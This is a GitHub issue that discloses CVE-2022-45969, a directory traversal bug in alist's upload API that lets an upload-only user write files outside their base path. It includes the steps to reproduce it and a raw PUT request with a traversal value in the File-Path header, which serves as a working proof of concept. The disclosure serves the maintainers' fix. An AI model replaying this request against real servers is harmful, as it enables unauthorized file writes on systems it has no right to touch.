CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

Please make sure of the following things

• I have read the documentation.
• I’m sure there are no duplicate issues or discussions.
• I’m sure it’s due to alist and not something else(such as Dependencies or Operational).
• I’m sure I’m using the latest version

Alist Version / Alist 版本

v3.4.0（It seems like this problem still exists in version 3.5.1）

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

• A user with only file upload permission can bypass the base path restriction by using ‘… /’ to bypass the base path restriction and upload files to an arbitrary path

• I created a user ‘test’ with file upload permission only and set its base path to ‘/test’

• My file directory structure is as follows

• Login as 'test’, found out that I am already in ‘/test’

• And try to upload a file, catch the package and modified the ‘File-path’ parameter with ‘…/’

• Send the package, and login as ‘admin’ to check out the '/testPasswd’. Will find out that the file has been uploaded successfully.

Reproduction / 复现链接

Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, /
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
File-Path: …%2ftestPasswd%2ftestDirectoryTraversal
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

�PNG
�

Logs / 日志